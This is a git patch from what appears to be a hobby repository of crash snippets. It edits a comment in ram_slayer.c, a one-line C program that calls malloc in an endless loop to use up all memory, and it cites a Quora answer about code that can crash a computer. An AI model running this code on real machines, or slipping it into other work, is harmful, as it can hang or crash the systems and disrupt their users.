From 16a481363c2873dbc6c55c73c7c664b9758ed68e Mon Sep 17 00:00:00 2001 From: Minhas Kamal Date: Sat, 24 Dec 2016 21:08:16 +0600 Subject: [PATCH] Consumes full space of the RAM. --- ram_slayer.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ram_slayer.c b/ram_slayer.c index 1860dba..0ccebea 100644 --- a/ram_slayer.c +++ b/ram_slayer.c @@ -1,5 +1,5 @@ // Source: https://www.quora.com/What-is-your-smallest-piece-of-code-that-can-crash-the-computer/answer/George-Gonzalez-5?srid=u2HNX -// Usees up all space of RAM. +// Consumes full space of the RAM. main(){ while(malloc(1000));